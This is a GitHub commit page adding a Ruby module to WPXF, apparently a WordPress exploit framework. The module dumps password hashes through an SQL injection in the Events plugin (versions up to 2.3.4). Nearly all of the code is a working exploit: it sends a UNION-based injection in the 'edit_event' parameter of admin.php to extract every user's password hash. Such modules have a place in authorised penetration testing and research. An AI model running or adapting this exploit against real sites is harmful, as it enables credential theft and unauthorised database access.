Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 5abb4a5

Browse files
committed
Add Events <= 2.3.4 authenticated hash dump
1 parent 33c2e55 commit 5abb4a5

File tree

1 file changed

+59
-0
lines changed

1 file changed

+59
-0
lines changed
Lines changed: 59 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,59 @@
1+
# frozen_string_literal: true
2+
3+
class Wpxf::Auxiliary::EventsHashDump < Wpxf::Module
4+
include Wpxf::WordPress::HashDump
5+
6+
def initialize
7+
super
8+
9+
update_info(
10+
name: 'Events <= 2.3.4 Authenticated Hash Dump',
11+
desc: %(
12+
Events <= 2.3.4 contains an SQL injection vulnerability
13+
which can be leveraged by all registered users with the permission
14+
to manage events via the plugin. This module utilises this vulnerability
15+
to dump the hashed passwords of all users in the database.
16+
),
17+
author: [
18+
'Lenon Leite', # Disclosure
19+
'Rob Carr <rob[at]rastating.com>' # WPXF module
20+
],
21+
references: [
22+
['WPVDB', '8954'],
23+
['URL', 'http://lenonleite.com.br/en/blog/2017/11/03/wp-events-2-3-4-wordpress-plugin-sql-injetcion/']
24+
],
25+
date: 'Nov 03 2017'
26+
)
27+
end
28+
29+
def check
30+
check_plugin_version_from_readme('wp-events', '2.3.5')
31+
end
32+
33+
def requires_authentication
34+
true
35+
end
36+
37+
def reveals_one_row_per_request
38+
true
39+
end
40+
41+
def hashdump_request_params
42+
{
43+
'page' => 'wp-events-edit',
44+
'edit_event' => "-#{Utility::Text.rand_numeric(3)} UNION #{hashdump_sql_statement} #"
45+
}
46+
end
47+
48+
def hashdump_visible_field_index
49+
1
50+
end
51+
52+
def hashdump_number_of_cols
53+
14
54+
end
55+
56+
def vulnerable_url
57+
normalize_uri(wordpress_url_admin, 'admin.php')
58+
end
59+
end

0 commit comments

Comments
 (0)